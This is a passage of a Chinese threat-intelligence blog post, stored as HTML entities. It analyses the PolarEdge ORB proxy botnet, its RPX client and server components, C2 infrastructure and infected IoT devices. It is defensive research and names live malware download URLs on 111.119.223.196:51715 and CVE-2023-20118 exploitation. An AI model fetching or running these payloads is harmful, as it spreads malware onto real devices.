&#x6B63;&#x5728;&#x4F20;&#x64AD;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;&#x201C;w&#x201D;&#x7684;ELF&#x6587;&#x4EF6;&#x3002;AI&#x68C0;&#x6D4B;&#x6A21;&#x5757;&#x5C06;&#x5176;&#x6807;&#x6CE8;&#x4E3A;&#x4E0E;PolarEdge&#x76F8;&#x5173;&#xFF0C;&#x800C;&#x8BE5;&#x6587;&#x4EF6;&#x5728;VirusTotal&#x4E0A;&#x7684;&#x68C0;&#x6D4B;&#x7ED3;&#x679C;&#x4E3A;&#x96F6;&#x3002;&#x8FD9;&#x4E00;&#x53D1;&#x73B0;&#x5F15;&#x53D1;&#x4E86;PolarEdge&#x662F;&#x5426;&#x5DF2;&#x6084;&#x7136;&#x542F;&#x52A8;&#x65B0;&#x4E00;&#x8F6E;&#x6D3B;&#x52A8;&#x7684;&#x731C;&#x6D4B;&#x3002;&#x5E26;&#x7740;&#x597D;&#x5947;&#xFF0C;&#x6211;&#x4EEC;&#x5C55;&#x5F00;&#x4E86;&#x6DF1;&#x5165;&#x8C03;&#x67E5;&#x3002;&#x7ECF;&#x8FC7;&#x4E00;&#x7CFB;&#x5217;&#x5173;&#x8054;&#x5206;&#x6790;&#xFF0C;&#x4E00;&#x4E2A;&#x6B64;&#x524D;&#x4ECE;&#x672A;&#x88AB;&#x516C;&#x5F00;&#x8BB0;&#x5F55;&#x7684;&#x7EC4;&#x4EF6;<strong>RPX_Client</strong>&#x6D6E;&#x51FA;&#x6C34;&#x9762;&#x3002;&#x8BE5;&#x7EC4;&#x4EF6;&#x7684;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x662F;&#x5C06;&#x53D7;&#x63A7;&#x8BBE;&#x5907;&#x63A5;&#x5165;&#x6307;&#x5B9A;C2&#x8282;&#x70B9;&#x7684;&#x4EE3;&#x7406;&#x6C60;&#xFF0C;&#x4E3A;&#x5176;&#x63D0;&#x4F9B;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#xFF0C;&#x5E76;&#x652F;&#x6301;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x3002;</p>
<p><strong>PolarEdge</strong>&#x7531;<code>&#x5B89;&#x5168;&#x5382;&#x5546;Sekoia</code>&#x4E8E;2025&#x5E74;2&#x6708;25&#x65E5;&#x9996;&#x6B21;&#x62AB;&#x9732;&#x3002;&#x8BE5;&#x5A01;&#x80C1;&#x5229;&#x7528;&#x5B58;&#x5728;&#x6F0F;&#x6D1E;&#x7684;IoT&#xFF0C;&#x8FB9;&#x7F18;&#x7F51;&#x7EDC;&#x8BBE;&#x5907;&#xFF0C;&#x5E76;&#x7ED3;&#x5408;&#x8D2D;&#x4E70;&#x7684;VPS&#xFF0C;<strong>&#x7591;&#x4F3C;&#x6784;&#x5EFA;&#x4E00;&#x4E2A;&#x201C;&#x8FD0;&#x8425;&#x4E2D;&#x7EE7;&#x76D2;&#x5B50;&#x201D;&#xFF08;Operational Relay Boxes, ORB&#xFF09;&#x7F51;&#x7EDC;</strong>&#xFF0C;&#x7528;&#x4EE5;&#x534F;&#x52A9;&#x5B9E;&#x65BD;&#x5404;&#x7C7B;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#x6D3B;&#x52A8;&#x3002;ORB&#x7F51;&#x7EDC;&#x5728;&#x529F;&#x80FD;&#x4E0A;&#x7C7B;&#x4F3C;&#x4F4F;&#x5B85;&#x4EE3;&#x7406;&#xFF0C;&#x5B83;&#x7684;&#x6838;&#x5FC3;&#x76EE;&#x6807;&#x5E76;&#x975E;&#x76F4;&#x63A5;&#x5B9E;&#x65BD;&#x7834;&#x574F;&#x6027;&#x653B;&#x51FB;&#xFF0C;&#x800C;&#x662F;&#x81F4;&#x529B;&#x4E8E;&#x957F;&#x671F;&#x6F5C;&#x4F0F;&#x4E0E;&#x6D41;&#x91CF;&#x6DF7;&#x6DC6;&#xFF0C;&#x5C5E;&#x4E8E;&#x5178;&#x578B;&#x7684;&#x57FA;&#x7840;&#x670D;&#x52A1;&#x578B;&#x6076;&#x610F;&#x67B6;&#x6784;&#x3002;</p>
<p>ORB&#x7F51;&#x7EDC;&#x5728;&#x89C4;&#x907F;&#x68C0;&#x6D4B;&#xFF0C;&#x9690;&#x85CF;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x7684;&#x6765;&#x6E90;&#xFF0C;&#x590D;&#x6742;&#x5316;&#x5F52;&#x56E0;&#x5206;&#x6790;&#x7B49;&#x65B9;&#x9762;&#x7684;&#x7A81;&#x51FA;&#x8868;&#x73B0;&#xFF0C;&#x8BA9;&#x5176;&#x500D;&#x53D7;APT&#x7EA7;&#x653B;&#x51FB;&#x8005;&#x7684;&#x9752;&#x7750;&#xFF0C;&#x662F;2025&#x5E74;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x9886;&#x57DF;&#x7684;&#x70ED;&#x70B9;&#x4E4B;&#x4E00;&#x3002;&#x9488;&#x5BF9;ORB&#x7F51;&#x7EDC;&#x7684;&#x8FD9;&#x4E00;&#x7279;&#x6027;&#xFF0C;<code>&#x5B89;&#x5168;&#x5382;&#x5546;Mandiant</code>&#x751A;&#x81F3;&#x63D0;&#x51FA;&#x4E86; <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks?ref=blog.xlab.qianxin.com"><strong>&quot;ORB&#x5174;&#x8D77;&#xFF0C;IOC&#x6D88;&#x4EA1;&quot;</strong></a>&#x7684;&#x89C2;&#x70B9;&#xFF0C;&#x8BA4;&#x4E3A;ORB&#x7F51;&#x7EDC;&#x53EF;&#x80FD;&#x524A;&#x5F31;&#x4F20;&#x7EDF;&#x5A01;&#x80C1;&#x6307;&#x6807;&#xFF08;IOC&#xFF09;&#x5728;&#x653B;&#x51FB;&#x68C0;&#x6D4B;&#x4E0E;&#x6D3B;&#x52A8;&#x5F52;&#x56E0;&#x4E2D;&#x7684;&#x6709;&#x6548;&#x6027;&#x3002;</p>
<p>2025&#x5E74;8&#xFF0C;9&#x6708;&#xFF0C;<code>&#x8D44;&#x4EA7;&#x6D4B;&#x7ED8;&#x5382;&#x5546;Censys</code>&#x5148;&#x540E;&#x53D1;&#x5E03;&#x4E86;&#x4E24;&#x7BC7;&#x5173;&#x4E8E;PolarEdge&#x7684;&#x7814;&#x7A76;&#x62A5;&#x544A;&#xFF0C;&#x4ED6;&#x4EEC;&#x8FC7;&#x8BC1;&#x4E66;&#x5173;&#x8054;&#x91CD;&#x70B9;&#x5206;&#x6790;&#x4E86;&#x4E00;&#x5927;&#x6279;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;&#x5728;9&#x6708;23&#x65E5;&#x7684;&#x62A5;&#x544A;&#x4E2D;&#xFF0C;Censys&#x62AB;&#x9732;&#x4E86;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;<code>RPX_SERVER</code>&#x7684;&#x670D;&#x52A1;&#x7AEF;&#x7A0B;&#x5E8F;&#xFF0C;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x662F;&#x5145;&#x5F53;&#x53CD;&#x5411;&#x8FDE;&#x63A5;&#x4EE3;&#x7406;&#x7F51;&#x5173;&#x3002;&#x4F46;&#x56E0;&#x88AB;&#x544A;&#x77E5;&#x76F8;&#x5173;&#x8BC1;&#x4E66;&#x5E76;&#x975E;&#x653B;&#x51FB;&#x8005;&#x72EC;&#x6709;&#xFF0C;Censys&#x5BF9;&#x4E8E;&#x5C06;&#x8FD9;&#x4E9B;&#x8BBE;&#x65BD;&#x4EE5;&#x53CA;RPX_Server&#x4E0E;PolarEdge&#x660E;&#x786E;&#x5173;&#x8054;&#x7684;&#x4FE1;&#x5FC3;&#x6709;&#x6240;&#x4E0B;&#x964D;&#x3002;</p>
<blockquote>
<p>Censys Note:</p>
<p>&#x201C;&#x672C;&#x7814;&#x7A76;&#x65E9;&#x671F;&#x7248;&#x672C;&#x4E2D;&#x91CD;&#x70B9;&#x4ECB;&#x7ECD;&#x7684;&#x8BC1;&#x4E66;&#x5B58;&#x5728;&#x4E8E;&#x65E7;&#x7248;&#x672C;&#x7684; Mbed TLS 3.4.0 &#x7248;&#x672C;&#xFF08;&#x4EE5;&#x524D;&#x79F0;&#x4E3A; PolarSSL&#xFF09;&#x4E2D;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x6211;&#x4EEC;&#x4E0E;&#x201C;PolarEdge&#x201D;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5173;&#x8054;&#x7684; TLS &#x8BC1;&#x4E66;&#x4E5F;&#x6E90;&#x81EA;&#x540C;&#x4E00;&#x4E2A; Mbed TLS &#x5B58;&#x50A8;&#x5E93;&#x3002;&#x8FD9;&#x79CD;&#x65B0;&#x7684;&#x80CC;&#x666F;&#x964D;&#x4F4E;&#x4E86;&#x5C06;&#x6211;&#x4EEC;&#x5206;&#x6790;&#x7684; RPX &#x670D;&#x52A1;&#x5668;&#x76F4;&#x63A5;&#x4E0E; PolarEdge &#x8054;&#x7CFB;&#x8D77;&#x6765;&#x7684;&#x8BC1;&#x636E;&#x7684;&#x53EF;&#x4FE1;&#x5EA6;&#x3002;&#x201C;</p>
</blockquote>
<p>&#x7136;&#x800C;&#xFF0C;<strong>&#x4ECE;Xlab&#x7684;&#x89C6;&#x89D2;&#x6765;&#x770B;</strong>&#xFF0C;&#x6211;&#x4EEC;&#x6709;&#x6781;&#x9AD8;&#x7684;&#x4FE1;&#x5FC3;&#x5C06;Censys&#x539F;&#x59CB;&#x62A5;&#x544A;&#x4E2D;&#x63D0;&#x53CA;&#x7684;&#x90E8;&#x5206;&#x4F7F;&#x7528;PolarSSL&#x6D4B;&#x8BD5;&#x8BC1;&#x4E66;&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x4EE5;&#x53CA;RPX_Server&#x5F52;&#x56E0;&#x4E8E;PolarEdge&#x3002;&#x8FD9;&#x4E00;&#x5224;&#x65AD;&#x4E3B;&#x8981;&#x57FA;&#x4E8E;&#x6B64;&#x6B21;&#x6355;&#x83B7;&#x7684;RPX_Client&#x6837;&#x672C;&#x6240;&#x5E26;&#x6765;&#x7684;&#x72EC;&#x7279;&#x60C5;&#x62A5;&#xFF0C;&#x5177;&#x4F53;&#x4F9D;&#x636E;&#x5982;&#x4E0B;&#xFF1A;</p>
<ol>
<li>
<p>&#x4F20;&#x64AD;RPX_Client&#x7684;&#x811A;&#x672C;&#x7684;&#x7F16;&#x7801;&#x98CE;&#x683C;&#xFF0C;&#x4EE5;&#x53CA;ELF&#x6837;&#x672C;w&#x4E0E;&#x5DF2;&#x77E5;&#x7684;PolarEdge&#x6837;&#x672C;&#x5448;&#x73B0;&#x51FA;&#x660E;&#x663E;&#x7684;&#x540C;&#x6E90;&#x7279;&#x5F81;&#x3002;</p>
</li>
<li>
<p>RPX_Client&#x4E0E;RPX_Server&#x5728;&#x529F;&#x80FD;&#x4E0A;&#x9AD8;&#x5EA6;&#x5951;&#x5408;&#xFF0C;&#x6B63;&#x5982;&#x5176;&#x547D;&#x540D;&#x6240;&#x793A;&#xFF0C;&#x4E8C;&#x8005;&#x6784;&#x6210;&#x4E86;&#x5178;&#x578B;&#x7684;&#x5BA2;&#x6237;&#x7AEF;-&#x670D;&#x52A1;&#x5668;&#x5173;&#x7CFB;&#x3002;</p>
</li>
<li>
<p>&#x5728;&#x4E00;&#x4E2A;RPX_Server&#x7684;&#x6570;&#x636E;&#x5E93;&#x4E2D;&#x53D1;&#x73B0;&#x4E86;&#x901A;&#x8FC7;111.119.223.196&#x4F20;&#x64AD;RPX_Client&#x7684;&#x8BB0;&#x5F55;&#x3002;</p>
</li>
<li>
<p>&#x90E8;&#x5206;&#x4F7F;&#x7528;PolarSSL&#x6D4B;&#x8BD5;&#x8BC1;&#x4E66;&#x7684;&#x670D;&#x52A1;&#x5668;&#x80FD;&#x591F;&#x6B63;&#x786E;&#x5904;&#x7406;RPX_Client&#x7684;&#x8BF7;&#x6C42;&#xFF0C;&#x8FD9;&#x4E9B;&#x670D;&#x52A1;&#x5668;&#x4E0A;&#x90E8;&#x7F72;&#x4E86;RPX_Server&#x5B9E;&#x4F8B;&#x3002;</p>
</li>
</ol>
<p>RPX_Server&#x4E0E;RPX_Client&#x7684;&#x76F8;&#x7EE7;&#x53D1;&#x73B0;&#xFF0C;&#x4F7F;&#x6211;&#x4EEC;&#x6709;&#x673A;&#x4F1A;&#x66F4;&#x6DF1;&#x5165;&#x5730;&#x63A2;&#x7A76;PolarEdge&#x80CC;&#x540E;&#x7684;&#x4E2D;&#x7EE7;&#x8FD0;&#x884C;&#x673A;&#x5236;&#x3001;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;&#x6210;&#x679C;&#x662F;&#x559C;&#x4EBA;&#x7684;&#xFF0C;&#x5728;&#x8FD0;&#x884C;&#x673A;&#x5236;&#x5C42;&#x9762;&#xFF0C;&#x6211;&#x4EEC;&#x9010;&#x6B65;&#x6478;&#x6E05;&#x4E86;PolarEdge&#x5982;&#x4F55;&#x501F;&#x52A9;<code>RPX_Server&#x3001;Go-Admin&#x4E0E;Nginx</code>&#x5B9E;&#x73B0;&#x8282;&#x70B9;&#x7BA1;&#x7406;&#x4E0E;&#x4E1A;&#x52A1;&#x5206;&#x53D1;&#xFF1B;&#x5728;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x5C42;&#x9762;&#xFF0C;&#x76EE;&#x524D;&#x5DF2;&#x8BC6;&#x522B;&#x51FA;140&#x4E2A;C2&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5E76;&#x53D1;&#x73B0;&#x603B;&#x8BA1;&#x8D85;&#x8FC7;25000&#x4E2A;&#x611F;&#x67D3;&#x8282;&#x70B9;IP&#x3002;&#x7136;&#x800C;&#x5FC5;&#x987B;&#x627F;&#x8BA4;&#xFF0C;&#x4EFB;&#x4F55;&#x5355;&#x4E00;&#x5382;&#x5546;&#x7684;&#x76D1;&#x6D4B;&#x89C6;&#x91CE;&#x90FD;&#x5B58;&#x5728;&#x5176;&#x5C40;&#x9650;&#x6027;&#xFF0C;&#x5BF9;&#x4E00;&#x9879;&#x5A01;&#x80C1;&#x7684;&#x900F;&#x5F7B;&#x89E3;&#x6790;&#x5F80;&#x5F80;&#x79BB;&#x4E0D;&#x5F00;&#x884C;&#x4E1A;&#x5185;&#x7684;&#x5E7F;&#x6CDB;&#x534F;&#x4F5C;&#x3002;&#x4E3A;&#x66F4;&#x597D;&#x5730;&#x7814;&#x7A76;PolarEdge&#x8FD9;&#x4E00;ORB&#x7F51;&#x7EDC;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x64B0;&#x5199;&#x672C;&#x6587;&#x5411;&#x793E;&#x533A;&#x5206;&#x4EAB;&#x76F8;&#x5173;&#x53D1;&#x73B0;&#xFF0C;&#x5E0C;&#x671B;<strong>Sekoia&#x3001;Censes&#x3001;Xlab</strong>&#x7684;&#x7814;&#x7A76;&#x6210;&#x679C;&#x80FD;&#x591F;&#x4E3A;&#x540E;&#x7EED;&#x5BF9;PolarEdge&#x7684;&#x6DF1;&#x5165;&#x63A2;&#x7D22;&#x5960;&#x5B9A;&#x57FA;&#x7840;&#x3002;</p>
<h1 id="1-%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD-%E9%83%A8%E5%88%86%E8%A7%84%E6%A8%A1">1: &#x57FA;&#x7840;&#x8BBE;&#x65BD; &amp; &#x90E8;&#x5206;&#x89C4;&#x6A21;</h1>
<h2 id="rpx-server-140%E4%B8%AAvps%E8%8A%82%E7%82%B9">RPX Server: 140&#x4E2A;VPS&#x8282;&#x70B9;</h2>
<p>&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x4E0D;&#x540C;&#x65F6;&#x95F4;&#x6BB5;&#x7684;&#x811A;&#x672C;q&#x6355;&#x83B7;&#x4E86;10&#x4E2A;&#x7684;RPX Server IP&#xFF0C;&#x5B83;&#x4EEC;&#x90FD;&#x4F7F;&#x7528;55555&#x7AEF;&#x53E3;&#xFF0C;&#x8BE5;&#x7AEF;&#x53E3;&#x5171;&#x4EAB;&#x540C;&#x4E00;&#x4E2A;<a href="https://raw.githubusercontent.com/Mbed-TLS/mbedtls/refs/tags/v3.4.0/tests/data_files/server5.crt?ref=blog.xlab.qianxin.com">&#x516C;&#x5F00;&#x7684;PolarSSL&#x6D4B;&#x8BD5;&#x8BC1;&#x4E66;</a>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_certificate.png" alt="polar_certificate.png" loading="lazy"></p>
<p>&#x4EE5;<code>&#x8BC1;&#x4E66;+ &#x7AEF;&#x53E3;55555</code>&#x8FD9;&#x4E00;&#x6A21;&#x5F0F;&#x4F5C;&#x4E3A;&#x7279;&#x5F81;&#xFF0C;&#x901A;&#x8FC7;<code>&#x5947;&#x5B89;&#x4FE1;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x6D4B;&#x7ED8;&#x7CFB;&#x7EDF;&#x9E70;&#x56FE;&#x5E73;&#x53F0;</code>&#xFF0C;&#x6211;&#x4EEC;&#x521D;&#x6B65;&#x8BC6;&#x522B;&#x51FA;161&#x4E2A;IP&#xFF0C;&#x518D;&#x57FA;&#x4E8E;&#x9006;&#x5411;&#x5DE5;&#x7A0B;&#x6240;&#x5F97;&#x7684;&#x901A;&#x4FE1;&#x534F;&#x8BAE;&#x5BF9;&#x8FD9;&#x6279;&#x8D44;&#x4EA7;&#x8FDB;&#x884C;&#x4E86;&#x9A8C;&#x8BC1;&#xFF0C;<strong>&#x786E;&#x8BA4;&#x5176;&#x4E2D;140&#x4E2A;IP&#x4E3A;&#x53EF;&#x6B63;&#x5E38;&#x4EA4;&#x4E92;&#x7684;&#x6709;&#x6548;RPX Server</strong>&#x3002;(&#x6CE8;&#xFF1A;&#x76EE;&#x524D;&#xFF0C;IP 8.219.214.27&#x867D;&#x7136;&#x65E0;&#x6CD5;&#x6B63;&#x5E38;&#x4EA4;&#x4E92;&#xFF0C;&#x4F46;&#x901A;&#x8FC7;&#x4E0E;&#x5176;&#x4ED6;&#x6570;&#x636E;&#x6BD4;&#x5BF9;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;&#x8BE5;IP&#x4ECD;&#x5C5E;&#x4E8E;RPX&#x670D;&#x52A1;&#x5668;&#x3002;&#xFF09;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_hunter.png" alt="polar_hunter.png" loading="lazy"></p>
<p>&#x8FD9;140&#x4E2A;Server&#x672C;&#x8EAB;&#x4E5F;&#x5448;&#x73B0;&#x5F88;&#x6709;&#x610F;&#x601D;&#x7684;&#x7279;&#x5F81;&#xFF0C;&#x5B83;&#x4EEC;&#x90FD;&#x662F;VPS&#x8282;&#x70B9;&#xFF0C;&#x96C6;&#x4E2D;&#x5206;&#x5E03;&#x5728;ASN45102&#xFF0C;ASN37963&#xFF0C;ASN132203&#xFF0C;&#x96B6;&#x5C5E;&#x4E8E;&#x963F;&#x91CC;&#x4E91;&#x548C;&#x817E;&#x8BAF;&#x4E91;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_asn.png" alt="polar_asn.png" loading="lazy"></p>
<p>&#x901A;&#x8FC7;&#x9006;&#x5411;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x53D1;&#x73B0;&#x4E86;API&#x63A5;&#x53E3;&#x53EF;&#x5C06;&#x8FD9;&#x4E9B;&#x670D;&#x52A1;&#x5668;&#x4EE3;&#x7406;&#x6C60;&#x4E2D;&#x7684;&#x8282;&#x70B9;&#x751F;&#x6210;Clash<code>(&#x4EE3;&#x7406;&#x5DE5;&#x5177;)</code>&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x4F9B;&#x5404;&#x7C7B;&#x653B;&#x51FB;&#x8005;&#x6216;&#x67D0;&#x4E2A;&#x7279;&#x5B9A;&#x6D3B;&#x52A8;&#x4F7F;&#x7528;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_clash.png" alt="polar_clash.png" loading="lazy"></p>
<h2 id="rpx-client-25000-%E8%A2%AB%E6%84%9F%E6%9F%93%E7%9A%84iot%E8%AE%BE%E5%A4%87%E8%B7%AF%E7%94%B1%E5%99%A8ip">RPX Client: 25000+ &#x88AB;&#x611F;&#x67D3;&#x7684;IoT&#x8BBE;&#x5907;&amp;&#x8DEF;&#x7531;&#x5668;IP</h2>
<p>&#x901A;&#x8FC7;&#x6280;&#x672F;&#x624B;&#x6BB5;&#xFF0C;&#x6211;&#x4EEC;&#x83B7;&#x53D6;&#x4E86;&#x90E8;&#x5206;RPX&#x5BA2;&#x6237;&#x7AEF;&#x6570;&#x636E;&#x96C6;&#x3002;&#x6570;&#x636E;&#x6DB5;&#x76D6;IP&#x3001;brand&#x3001;createAt&#x3001;onlineTime&#x7B49;&#x5B57;&#x6BB5;&#xFF0C;&#x4F7F;&#x6211;&#x4EEC;&#x80FD;&#x591F;&#x4ECE;<strong>&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x3001;&#x5730;&#x7406;&#x5206;&#x5E03;&#x53CA;&#x8BBE;&#x5907;&#x7C7B;&#x578B;</strong>&#x7B49;&#x591A;&#x4E2A;&#x7EF4;&#x5EA6;&#xFF0C;&#x5BF9;PolarEdge RPX&#x8FDB;&#x884C;&#x6DF1;&#x5165;&#x5206;&#x6790;&#x3002;</p>
<pre><code># RPX  Client Data Example
{
id: 4,
uuid: &quot;6cee47cf79f94dc4bf2b867028fc{mask}&quot;,
ip: &quot;12x.18x.18x.23x&quot;,
onlineTime: &quot;2025-10-16T14:34:27+08:00&quot;,
antiConnTotal: &quot;0&quot;,
antiConnNum: &quot;0&quot;,
antiConnState: &quot;1&quot;,
antiConnTime: &quot;0001-01-01T00:00:00Z&quot;,
brand: &quot;ktcctv_1&quot;,
version: &quot;0.0.13&quot;,
heartbeat_time: &quot;60&quot;,
no_response_num: &quot;1&quot;,
...
...
createdAt: &quot;2025-10-16T14:34:13+08:00&quot;,
updatedAt: &quot;2025-10-20T13:08:04+08:00&quot;,
createBy: 0,
updateBy: 0
}
</code></pre>
<p>&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#x663E;&#x793A;&#xFF0C;&#x81EA;2024&#x5E74;7&#x6708;&#x4EE5;&#x6765;&#xFF0C;&#x5DF2;&#x7D2F;&#x8BA1;&#x611F;&#x67D3;&#x8D85;&#x8FC7;25,000&#x4E2A;IP&#xFF0C;&#x4E14;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x5448;&#x73B0;&#x6301;&#x7EED;&#x4E0A;&#x5347;&#x8D8B;&#x52BF;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_clients.png" alt="polar_clients.png" loading="lazy"></p>
<p>&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x5206;&#x5E03;&#x5728;40&#x4E2A;&#x56FD;&#x5BB6;&#x5730;&#x533A;&#xFF0C;&#x4E3B;&#x8981;&#x96C6;&#x4E2D;&#x5728;&#x4E1C;&#x5357;&#x4E9A;&#x4EE5;&#x53CA;&#x5317;&#x7F8E;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_example2.png" alt="polar_example2.png" loading="lazy"></p>
<p>&#x6392;&#x540D;&#x524D;&#x5341;&#x7684;&#x56FD;&#x5BB6;&#x5206;&#x522B;&#x4E3A;&#xFF1A;&#x97E9;&#x56FD;41.97%&#xFF0C;&#x4E2D;&#x56FD;20.35%&#xFF0C;&#x6CF0;&#x56FD;8.37%&#xFF0C;&#x9A6C;&#x6765;&#x897F;&#x4E9A;5.98%&#xFF0C;&#x5370;&#x5EA6;3.79&#xFF0C;&#x4EE5;&#x8272;&#x5217;3.73%&#xFF0C;&#x7F8E;&#x56FD;3.69%&#xFF0C;&#x8D8A;&#x5357;2.56%&#xFF0C;&#x5370;&#x5EA6;&#x5C3C;&#x897F;&#x4E9A;2.12%&#xFF0C;&#x4FC4;&#x7F57;&#x65AF;1.19%&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_victims.png" alt="polar_victims.png" loading="lazy"></p>
<p>RXP Client &#x5728;&#x5411; Server &#x4E0A;&#x62A5;&#x4FE1;&#x606F;&#x65F6;&#xFF0C;&#x901A;&#x8FC7; brand &#x5B57;&#x6BB5;&#x6765;&#x6807;&#x8BC6;&#x8BBE;&#x5907;&#x7684;&#x5206;&#x7EC4;&#x6216;&#x7C7B;&#x578B;&#xFF0C;ktcctv&#x548C;tvt&#x662F;&#x4E3B;&#x8981;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#xFF0C;&#x5360;&#x6BD4;&#x8D85;&#x8FC7;90%&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_groups.png" alt="polar_groups.png" loading="lazy"></p>
<p>&#x4EE5;&#x4E0B;&#x4E3A;&#x5206;&#x7EC4;&#x5B57;&#x4E32;&#x4E0E;&#x771F;&#x5B9E;&#x8BBE;&#x5907;&#x7684;&#x5BF9;&#x5E94;&#x3002;</p>
<table>
<thead>
<tr>
<th>Group</th>
<th>Device</th>
</tr>
</thead>
<tbody>
<tr>
<td>ktcctv</td>
<td>KT CCTV</td>
</tr>
<tr>
<td>tvt</td>
<td>Shenzhen TVT DVR</td>
</tr>
<tr>
<td>cyberoam</td>
<td>Cyberoam UTM</td>
</tr>
<tr>
<td>fh</td>
<td>unknow</td>
</tr>
<tr>
<td>asus</td>
<td>Asus Router</td>
</tr>
<tr>
<td>draytek</td>
<td>DrayTek Router</td>
</tr>
<tr>
<td>rv340</td>
<td>Cisco RV340 VPN Router</td>
</tr>
<tr>
<td>dlink</td>
<td>D-Link Router</td>
</tr>
<tr>
<td>univ</td>
<td>Uniview Webcam</td>
</tr>
</tbody>
</table>
<h1 id="2-%E6%97%B6%E9%97%B4%E7%BA%BF-%E5%85%B3%E8%81%94%E5%88%86%E6%9E%90">2: &#x65F6;&#x95F4;&#x7EBF; &amp; &#x5173;&#x8054;&#x5206;&#x6790;</h1>
<h2 id="%E6%8D%95%E8%8E%B7%E6%96%B0%E8%84%9A%E6%9C%AC%E7%9A%84%E6%97%B6%E9%97%B4%E7%BA%BF">&#x6355;&#x83B7;&#x65B0;&#x811A;&#x672C;&#x7684;&#x65F6;&#x95F4;&#x7EBF;</h2>
<ul>
<li><strong>2025&#x5E74;4&#x6708;27&#x65E5;</strong>&#xFF0C;&#x6211;&#x4EEC;&#x76D1;&#x6D4B;&#x5230;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528; CVE-2023-20118 &#x901A;&#x8FC7;111.119.223.196&#x4F20;&#x64AD;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;s&#x7684;&#x811A;&#x672C;&#xFF0C;&#x9057;&#x61BE;&#x7684;&#x662F;&#xFF0C;&#x5F53;&#x65F6;&#x7531;&#x4E8E;&#x7F51;&#x7EDC;&#x6545;&#x969C;&#x8FD9;&#x4E00;&#x811A;&#x672C;&#x5E76;&#x6CA1;&#x6709;&#x88AB;&#x6355;&#x83B7;&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_cvepayload.png" alt="polar_cvepayload.png" loading="lazy"></p>
<ul>
<li><strong>2025&#x5E74;5&#x6708;30&#x65E5;</strong>&#xFF0C;IP 111.119.223.196&#x4F20;&#x64AD;&#x4E00;&#x4E2A;&#x540D;&#x4E3A; <strong>w</strong> &#x7684;ELF&#x6587;&#x4EF6;&#xFF0C;&#x5176;&#x4E0B;&#x8F7D;&#x94FE;&#x63A5;&#x4E3A; <code>111.119.223.196:51715/w</code>&#x3002;&#x7ECF;&#x67E5;&#xFF0C;&#x8BE5;&#x6587;&#x4EF6;&#x65E9;&#x5728;2023&#x5E74;12&#x6708;25&#x65E5;&#x5C31;&#x66FE;&#x7531;IP <code>82.118.22.155</code>&#x4F20;&#x64AD;&#x3002;&#x901A;&#x8FC7;&#x5206;&#x6790;IP 82&#x7684;&#x5386;&#x53F2;&#x6D3B;&#x52A8;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x4E00;&#x4E2A;&#x6E05;&#x6670;&#x7684;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#xFF1A;<strong>&#x811A;&#x672C;a &#x2192; w &#x2192; &#x811A;&#x672C;q</strong>&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_qdownload.png" alt="polar_qdownload.png" loading="lazy"><br>
&#x8FD9;&#x7ED9;&#x4E86;&#x6211;&#x4EEC;&#x542F;&#x53D1;&#xFF1A;&#x5F53;&#x524D;&#x7684;IP 111&#x53EF;&#x80FD;&#x4E5F;&#x5B58;&#x5728;&#x76F8;&#x540C;&#x7684;&#x94FE;&#x6761;&#x3002;&#x4E8E;&#x662F;&#xFF0C;&#x6211;&#x4EEC;&#x5C55;&#x5F00;&#x4E86;&#x4E3B;&#x52A8;&#x72E9;&#x730E;&#xFF0C;&#x5C06; <code>111.119.223.196:51715/q</code> &#x8FD9;&#x4E00;&#x5730;&#x5740;&#x7EB3;&#x5165;&#x4E86;Xlab&#x7684;Payload&#x76D1;&#x63A7;&#x7CFB;&#x7EDF;&#x3002;</p>
<ul>
